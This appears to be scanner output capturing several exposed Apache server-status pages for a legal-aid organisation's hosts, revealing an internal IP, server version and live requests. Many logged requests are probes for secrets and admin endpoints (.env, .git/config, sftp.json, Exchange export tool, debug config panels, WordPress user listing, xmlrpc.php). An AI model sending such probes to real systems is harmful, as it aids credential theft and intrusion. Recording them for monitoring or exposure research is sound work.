15.158.40.167http/1.1secure.alas.org:8080GET /_all_dbs HTTP/1.1 50-173284552/2/1235W 0.240033.20.0324.81 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 51-173284800/2/1230W 0.25000.00.0316.60 15.158.40.167http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-173284813/3/1381K 0.09008.40.0118.47 15.158.40.169http/1.1short.alas.org:80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea4a5167fd
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 12-Oct-2023 00:03:18 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 174 Parent Server MPM Generation: 173 Server uptime: 173 days 8 hours 19 minutes 19 seconds Server load: 0.25 0.07 0.02 Total accesses: 2869673 - Total Traffic: 40.6 GB CPU Usage: u47.34 s8.38 cu0 cs0 - .000372% CPU load .192 requests/sec - 2913 B/second - 14.8 kB/request 106 requests currently being processed, 24 idle workers WWWKWWKWK_KKKKK_WKKWKWWWKWKWWKWKKWKKKKKKW_KWKKKWKKKWKKWK_WKWWKWK KKKKKWKKKWWWWKKKWWKWKKKKWKKWWKKKKWWKKKWKWKKK_KK_________________ __SS.................. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-173282748/8/207941W 0.630014.70.013020.17 15.158.40.169http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 1-173280084/28/202806W 1.6820235.30.643048.77 15.158.40.169http/1.1intranet.alas.org:8080GET /v2/_catalog HTTP/1.1 2-173282316/10/193266W 1.0830277.10.282925.37 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 3-1732823810/13/192749K 1.400188.30.092785.49 15.158.40.169http/1.1on.alas.org:8080GET /server-status HTTP/1.1 4-173281674/15/189268W 2.05105.90.522738.82 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 5-173271296/89/182603W 6.612047.42.032658.93 15.158.40.137http/1.1events.alas.org:8080GET / HTTP/1.1 6-173282395/7/173976K 1.8403991236.40.232649.58 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 7-1732803510/28/175017W 1.3000282.90.352529.96 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 8-173280364/21/158525K 1.7600275.10.402531.52 15.158.40.169http/1.1secure.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-173282790/7/156098_ 0.45027930.00.122027.58 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-173281683/15/138954K 2.400248235.40.242080.48 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 11-173282806/6/119542K 0.130048.20.051807.13 15.158.40.169http/1.1on.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 12-173276979/54/114558K 3.0007258.60.651606.25 15.158.40.169http/1.1esign.alas.org:8080GET /server-status HTTP/1.1 13-173282896/6/83327K 0.090046.50.051118.03 15.158.40.169http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 14-173282902/4/70269K 1.38002.30.32922.44 15.158.40.167http/1.1secure.alas.org:8080GET /.env HTTP/1.1 15-173282950/3/71095_ 0.56026040.00.10966.01 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 16-173282965/5/58180W 0.01006.00.01820.15 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 17-173283094/4/33836K 0.320040.30.04465.86 15.158.40.169http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 18-173283105/5/24064K 0.100045.50.04337.93 15.158.40.169http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 19-173283161/1/23457W 0.00301.40.00388.61 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 20-173283174/4/23858K 0.55005.40.01343.40 15.158.40.169http/1.1on.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 21-173283221/1/21613W 0.01401.40.00352.10 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 22-173283243/3/22299W 0.01108.10.01291.02 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 23-173283282/2/19977W 0.7510232.60.23307.86 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 24-173283294/4/19373K 0.54004.40.00221.26 15.158.40.169http/1.1secure.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 25-173283500/0/9224W 0.00400.00.00167.37 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 26-173283514/4/9155K 0.01009.90.01158.76 15.158.40.169http/1.1elearning.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 27-173283550/0/10353W 0.00400.00.00141.57 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-173283570/0/7823W 0.00400.00.00108.15 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-173283581/1/7600K 0.55038591.00.00116.48 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 30-173283592/2/7567W 0.250034.40.03119.56 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-173283603/3/7171K 0.240034.20.0399.69 15.158.40.169http/1.1esign.alas.org:8080GET /.git/config HTTP/1.1 32-173283613/3/7508K 0.240034.30.03113.97 15.158.40.169http/1.1elearning.alas.org:8080GET /lib/editor/tiny/loader.php?rev=abc&filepath=hello.css HTTP 33-173283623/3/7360W 0.240038.70.04120.92 15.158.40.169http/1.1esign.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 34-173283633/3/7194K 0.250035.50.0383.21 15.158.40.169http/1.1on.alas.org:8080GET /v2/_catalog HTTP/1.1 35-173283643/3/6603K 0.2706435.70.0394.44 15.158.40.169http/1.1esign.alas.org:8080GET / HTTP/1.1 36-173283744/4/7034K 0.13004.20.00111.96 15.158.40.169http/1.1on.alas.org:8080GET / HTTP/1.1 37-173283844/4/9947K 0.15005.30.01115.63 15.158.40.169http/1.1secure.alas.org:8080GET /.git/config HTTP/1.1 38-173283855/5/7040K 0.13105.10.0084.85 15.158.40.137http/1.1on.alas.org:8080GET /about HTTP/1.1 39-173284126/6/7765K 0.031010.70.01112.21 15.158.40.137http/1.1secure.alas.org:8080GET /config.json HTTP/1.1 40-173284130/0/6209W 0.00400.00.0067.84 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 41-173284300/2/3663_ 0.26026370.00.0335.03 15.158.40.167http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-173284311/1/4081K 0.250247532.10.0343.14 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 43-173284320/0/2172W 0.00300.00.0019.08 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-173284352/2/1439K 0.150683.20.0014.61 15.158.40.169http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 45-173284382/2/2281K 0.13002.00.0029.77 15.158.40.169http/1.1on.alas.org:8080GET /v2/_catalog HTTP/1.1 46-173284393/3/1524K 0.00003.10.0013.03 15.158.40.169http/1.1secure.alas.org:8080GET /v2/_catalog HTTP/1.1 47-173284400/0/1391W 1.53300.00.0024.14 15.158.40.137http/1.1intranet.alas.org:8080GET / HTTP/1.1 48-173284413/3/2063K 0.13003.00.0030.27 15.158.40.167http/1.1on.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 49-173284541/1/2273K 0.250263132.10.0320.97 15.158.40.167http/1.1elearning.alas.org:8080GET / HTTP/1.1 50-173284552/2/1235K 0.240033.20.0324.81 15.158.40.169http/1.1elearning.alas.org:8080GET /about HTTP/1.1 51-173284800/2/1230W 0.25000.00.0316.60 15.158.40.167http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-173284812/2/1380K 0.09011877.30.0118.46 15.158.40.169http/1.1survey.alas.org:8080GET /about HTTP/1.1<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feae22fd984
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 13-Jun-2023 23:38:15 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 54 Parent Server MPM Generation: 53 Server uptime: 53 days 7 hours 54 minutes 16 seconds Server load: 8.41 1.84 0.60 Total accesses: 671993 - Total Traffic: 11.7 GB CPU Usage: u97.76 s13.19 cu0 cs0 - .00241% CPU load .146 requests/sec - 2729 B/second - 18.3 kB/request 109 requests currently being processed, 26 idle workers KWWKWKKKKKKWKK__WKK_KKKWC.__C.__WK_KKW__K_KKKWK_KKKKWKKKKKKKKKWK KKKWWKKKKW_KKWK_WK_WKKWKK__K_WWWKKKK_KKKWW_KKKKW_KWW__K__KW_KKKK WKKWKWKKK............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-53276764/18/45893K 1.261615.70.14831.33 70.132.4.89http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 1-53276494/28/46847W 1.11109.90.32901.10 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 2-53277374/7/45358W 0.60105.50.06810.66 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 3-53270584/42/42335K 4.20285551.00.53751.84 70.132.4.95http/1.1survey.alas.org:8080GET / HTTP/1.1 4-53274933/28/43081W 1.87104.50.33696.70 70.132.4.89http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 5-53276815/26/42355K 1.29006.70.13726.13 70.132.4.67http/1.1elearning.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 6-53277453/4/39192K 0.14103.10.01749.02 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 7-53274944/24/38947K 1.59007.90.14745.13 70.132.4.89http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 8-53276825/19/34618K 0.780045.60.17719.01 70.132.4.67http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-53276653/26/32901K 1.74103.60.33586.80 70.132.4.89http/1.1secure.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 10-53276665/28/32816K 1.27106.60.32595.51 70.132.4.95http/1.1survey.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 11-53277463/7/26109W 0.630043.50.05471.32 70.132.4.89http/1.1atlantalegalaid.org:8080GET /debug/default/view?panel=config HTTP/1.1 12-53277555/19/24027K 1.26081713.50.10453.75 70.132.4.67http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-53277562/9/20988K 0.351138.90.06343.21 70.132.4.67http/1.1secure.alas.org:8080GET /server-status HTTP/1.1 14-53277610/3/17649_ 0.7046920.00.01280.61 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 15-53277660/8/16327_ 0.68061370.00.03332.51 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 16-53277750/1/14470W 0.09600.00.00217.23 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 17-53277765/6/9603K 0.24105.30.01127.61 70.132.4.95http/1.1elearning.alas.org:8080GET /login.action HTTP/1.1 18-53277774/6/8554K 0.031605.80.01103.55 70.132.4.89http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 19-53277780/4/6504_ 0.42127500.00.04112.42 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 20-53277791/3/6758K 0.56054941.00.01100.25 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 21-53277804/5/5222K 0.04004.20.09102.37 70.132.4.89http/1.1esign.alas.org:8080GET /.git/config HTTP/1.1 22-53277814/5/6942K 0.05004.60.2095.16 70.132.4.89http/1.1on.alas.org:8080GET /login.action HTTP/1.1 23-53277861/3/5062W 0.250032.10.04105.46 70.132.4.89http/1.1atlantalegalaid.org:8080GET /debug/default/view?panel=config HTTP/1.1 24-53278151/2/5177C 0.12000.20.0058.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-53-0/0/2527. 0.18000.00.0052.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-53273600/27/2863_ 2.64000.01.3772.60 52.46.36.134http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 27-53278210/2/2314_ 0.1415680.00.0151.73 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 28-53278261/3/2220C 0.1204003.60.0541.91 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 29-53-0/0/2082. 0.00200.00.0048.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-53278320/2/1950_ 0.5847820.00.1531.63 64.252.67.193http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/json HTT 31-53278330/1/1821_ 0.1343550.00.0029.38 15.158.5.85http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 32-53278340/1/1817W 0.01300.00.0050.54 70.132.4.157http/1.1intranet.alas.org:8080GET / HTTP/1.1 33-53278354/5/2898K 0.03005.70.0155.69 70.132.4.89http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 34-53278360/2/1902_ 0.5847730.00.1526.09 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/href HTT 35-53278375/6/1421K 0.00005.20.0123.35 70.132.4.95http/1.1elearning.alas.org:8080GET /.git/config HTTP/1.1 36-53278462/3/1611K 0.102106843.00.0538.90 205.251.218.133http/1.1survey.alas.org:8080GET / HTTP/1.1 37-53278473/4/1940W 0.01203.40.0124.95 70.132.4.95http/1.1events.alas.org:8080GET / HTTP/1.1 38-53278800/2/1388_ 0.5847520.00.1521.56 64.252.67.218http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/deeplink HTT 39-53278810/2/1460_ 0.0728440.00.0923.63 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 40-53278821/2/1375K 0.14218221.00.0118.01 52.46.36.134http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 41-53279120/1/551_ 0.64361890.00.0011.24 130.176.137.155http/1.1intranet.alas.org:8080GET /wp-admin/upload.php?mode=list HTTP/1.1 42-53279138/23/533K 0.020012.20.119.00 70.132.4.67http/1.1secure.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 43-53279183/3/730K 0.56003.00.009.01 70.132.4.67http/1.1elearning.alas.org:8080GET /login.action HTTP/1.1 44-53279233/3/648K 0.58104.30.006.60 70.132.4.67http/1.1elearning.alas.org:8080GET /.git/config HTTP/1.1 45-53279243/3/863W 0.56203.10.0014.10 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 46-53279254/5/536K 0.18005.50.047.09 70.132.4.67http/1.1elearning.alas.org:8080GET /telescope/requests HTTP/1.1 47-53279260/8/492_ 0.28029970.00.096.26 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 48-53279274/4/511K 0.57004.10.007.33 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 49-53279287/7/368K 0.17108.80.014.74 70.132.4.67http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 50-53279296/6/636K 0.111048.20.059.89 70.132.4.67http/1.1esign.alas.org:8080GET /.env HTTP/1.1 51-53279305/5/500K 0.18105.40.017.45 70.132.4.67http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 52-53279317/7/474W 0.080012.10.015.98 70.132.4.67http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 53-53279404/4/392K 0.56119.90.019
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feaf14a2e54
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 13-Jun-2023 23:38:14 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 54 Parent Server MPM Generation: 53 Server uptime: 53 days 7 hours 54 minutes 16 seconds Server load: 8.41 1.84 0.60 Total accesses: 671953 - Total Traffic: 11.7 GB CPU Usage: u119.7 s14.64 cu0 cs0 - .00292% CPU load .146 requests/sec - 2729 B/second - 18.3 kB/request 120 requests currently being processed, 15 idle workers KWWKWKKKKKKKWK_WWKK_KKKKC.K__.__WK_KKW__K_KKKWK_KKKKKKKKKKKKWKWK KKKKKWKKKWWKKKKWKKWWKKWKKW_KWKWWKKKKWKKKKWWKKKKWWKWWW_K_WKW_KKKK WWKWKWKKK............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-53276764/18/45893K 1.261615.70.14831.33 70.132.4.89http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 1-53276494/28/46847W 1.11009.90.32901.10 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 2-53277374/7/45358W 0.60005.50.06810.66 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 3-53270584/42/42335K 4.20185551.00.53751.84 70.132.4.95http/1.1survey.alas.org:8080GET / HTTP/1.1 4-53274933/28/43081W 1.87104.50.33696.70 70.132.4.89http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 5-53276814/25/42354K 1.29105.60.13726.13 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 6-53277453/4/39192K 0.14003.10.01749.02 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 7-53274944/24/38947K 1.59007.90.14745.13 70.132.4.89http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 8-53276824/18/34617K 0.780044.50.16719.01 70.132.4.67http/1.1elearning.alas.org:8080GET /_all_dbs HTTP/1.1 9-53276653/26/32901K 1.74103.60.33586.80 70.132.4.89http/1.1secure.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 10-53276665/28/32816K 1.27006.60.32595.51 70.132.4.95http/1.1survey.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 11-53277463/7/26109K 0.63185243.50.05471.32 70.132.4.89http/1.1survey.alas.org:8080GET / HTTP/1.1 12-53277554/18/24026W 1.18007.60.09453.74 70.132.4.67http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-53277562/9/20988K 0.350138.90.06343.21 70.132.4.67http/1.1secure.alas.org:8080GET /server-status HTTP/1.1 14-53277610/3/17649_ 0.7036920.00.01280.61 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 15-53277660/7/16326W 0.12600.00.03332.51 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 16-53277750/1/14470W 0.09500.00.00217.23 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 17-53277765/6/9603K 0.24005.30.01127.61 70.132.4.95http/1.1elearning.alas.org:8080GET /login.action HTTP/1.1 18-53277774/6/8554K 0.030605.80.01103.55 70.132.4.89http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 19-53277780/4/6504_ 0.42027500.00.04112.42 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 20-53277791/3/6758K 0.56054941.00.01100.25 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 21-53277804/5/5222K 0.04004.20.09102.37 70.132.4.89http/1.1esign.alas.org:8080GET /.git/config HTTP/1.1 22-53277814/5/6942K 0.05004.60.2095.16 70.132.4.89http/1.1on.alas.org:8080GET /login.action HTTP/1.1 23-53277861/3/5062K 0.252290032.10.04105.46 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 24-53278151/2/5177C 0.12000.20.0058.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-53-0/0/2527. 0.18000.00.0052.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-53273601/27/2863K 2.64401.01.3772.60 52.46.36.134http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 27-53278210/2/2314_ 0.1405680.00.0151.73 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 28-53278260/2/2219_ 0.06460.00.0541.91 64.252.67.155http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/rbtools.min. 29-53-0/0/2082. 0.00200.00.0048.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-53278320/2/1950_ 0.5837820.00.1531.63 64.252.67.193http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/json HTT 31-53278330/1/1821_ 0.1343550.00.0029.38 15.158.5.85http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 32-53278340/1/1817W 0.01300.00.0050.54 70.132.4.157http/1.1intranet.alas.org:8080GET / HTTP/1.1 33-53278353/4/2897K 0.031304.60.0155.69 70.132.4.89http/1.1esign.alas.org:8080GET /_all_dbs HTTP/1.1 34-53278360/2/1902_ 0.5837730.00.1526.09 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/woocommerce/assets/js/frontend/href HTT 35-53278374/5/1420K 0.00104.20.0123.35 70.132.4.95http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 36-53278462/3/1611K 0.101106843.00.0538.90 205.251.218.133http/1.1survey.alas.org:8080GET / HTTP/1.1 37-53278473/4/1940W 0.01103.40.0124.95 70.132.4.95http/1.1events.alas.org:8080GET / HTTP/1.1 38-53278800/2/1388_ 0.5837520.00.1521.56 64.252.67.218http/1.1events.alas.org:8080GET /wp-content/plugins/revslider/public/assets/js/deeplink HTT 39-53278810/2/1460_ 0.0728440.00.0923.63 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 40-53278821/2/1375K 0.14218221.00.0118.01 52.46.36.134http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 41-53279120/1/551_ 0.64261890.00.0011.24 130.176.137.155http/1.1intranet.alas.org:8080GET /wp-admin/upload.php?mode=list HTTP/1.1 42-53279137/22/532K 0.021911.20.119.00 70.132.4.67http/1.1secure.alas.org:8080GET / HTTP/1.1 43-53279182/2/729K 0.56202.00.009.01 70.132.4.67http/1.1on.alas.org:8080GET /about HTTP/1.1 44-53279233/3/648K 0.58004.30.006.60 70.132.4.67http/1.1elearning.alas.org:8080GET /.git/config HTTP/1.1 45-53279243/3/863W 0.56103.10.0014.10 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 46-53279254/5/536K 0.18005.50.047.09 70.132.4.67http/1.1elearning.alas.org:8080GET /telescope/requests HTTP/1.1 47-53279260/8/492_ 0.28029970.00.096.26 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 48-53279274/4/511K 0.57004.10.007.33 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 49-53279287/7/368K 0.17008.80.014.74 70.132.4.67http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 50-53279296/6/636K 0.110048.20.059.89 70.132.4.67http/1.1esign.alas.org:8080GET /.env HTTP/1.1 51-53279305/5/500K 0.18005.40.017.45 70.132.4.67http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 52-53279317/7/474K 0.08079112.10.015.98 70.132.4.67http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 53-53279404/4/392K 0.56019.90.019.74 70.132.4.67http/1.1on.alas.org:8080GET /server-status HTTP/1.1 54-53
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea1cc9568b
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 13-Jun-2023 23:38:14 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 54 Parent Server MPM Generation: 53 Server uptime: 53 days 7 hours 54 minutes 15 seconds Server load: 6.10 1.28 0.41 Total accesses: 671931 - Total Traffic: 11.7 GB CPU Usage: u118.51 s14.47 cu0 cs0 - .00289% CPU load .146 requests/sec - 2729 B/second - 18.3 kB/request 122 requests currently being processed, 14 idle workers KWWKWKKKKKKKWK_WWKK_WKKK_CK__.__WK_KKW__K_KKKWKWKKKKKKKKKKKKWKWK KKKKKKKKKWWKKKKWKKWWKKWKKW_KWKWWKKKKWWKKKKWWKKKWWKWWW_KWWKW_KKKK WKKKKWKKK............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-53276764/18/45893K 1.260615.70.14831.33 70.132.4.89http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 1-53276494/28/46847W 1.11009.90.32901.10 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 2-53277374/7/45358W 0.60005.50.06810.66 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 3-53270584/42/42335K 4.20185551.00.53751.84 70.132.4.95http/1.1survey.alas.org:8080GET / HTTP/1.1 4-53274933/28/43081W 1.87004.50.33696.70 70.132.4.89http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 5-53276814/25/42354K 1.29005.60.13726.13 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 6-53277453/4/39192K 0.14003.10.01749.02 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 7-53274943/23/38946K 1.591546.90.14745.13 70.132.4.89http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 8-53276824/18/34617K 0.780044.50.16719.01 70.132.4.67http/1.1elearning.alas.org:8080GET /_all_dbs HTTP/1.1 9-53276653/26/32901K 1.74003.60.33586.80 70.132.4.89http/1.1secure.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 10-53276665/28/32816K 1.27006.60.32595.51 70.132.4.95http/1.1survey.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 11-53277463/7/26109K 0.63185243.50.05471.32 70.132.4.89http/1.1survey.alas.org:8080GET / HTTP/1.1 12-53277554/18/24026W 1.18007.60.09453.74 70.132.4.67http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-53277562/9/20988K 0.350138.90.06343.21 70.132.4.67http/1.1secure.alas.org:8080GET /server-status HTTP/1.1 14-53277610/3/17649_ 0.7036920.00.01280.61 70.132.55.84http/1.1gwinnettfamilylawclinic.org:808POST /xmlrpc.php HTTP/1.1 15-53277660/7/16326W 0.12500.00.03332.51 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 16-53277750/1/14470W 0.09500.00.00217.23 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 17-53277765/6/9603K 0.24005.30.01127.61 70.132.4.95http/1.1elearning.alas.org:8080GET /login.action HTTP/1.1 18-53277774/6/8554K 0.030605.80.01103.55 70.132.4.89http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 19-53277780/4/6504_ 0.42027500.00.04112.42 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 20-53277790/2/6757W 0.00500.00.01100.25 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 21-53277803/4/5221K 0.04203.20.09102.36 70.132.4.89http/1.1secure.alas.org:8080GET /config.json HTTP/1.1 22-53277813/4/6941K 0.05203.60.2095.16 70.132.4.89http/1.1on.alas.org:8080GET / HTTP/1.1 23-53277861/3/5062K 0.252290032.10.04105.46 70.132.4.89http/1.1elearning.alas.org:8080GET / HTTP/1.1 24-53278150/1/5176_ 0.1242750.00.0058.55 130.176.137.155http/1.1elearning.alas.org:8080GET /mod/book/view.php?id=141 HTTP/1.1 25-53278161/2/2527C 0.18000.20.0152.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-53273601/27/2863K 2.64401.01.3772.60 52.46.36.134http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 27-53278210/2/2314_ 0.1405680.00.0151.73 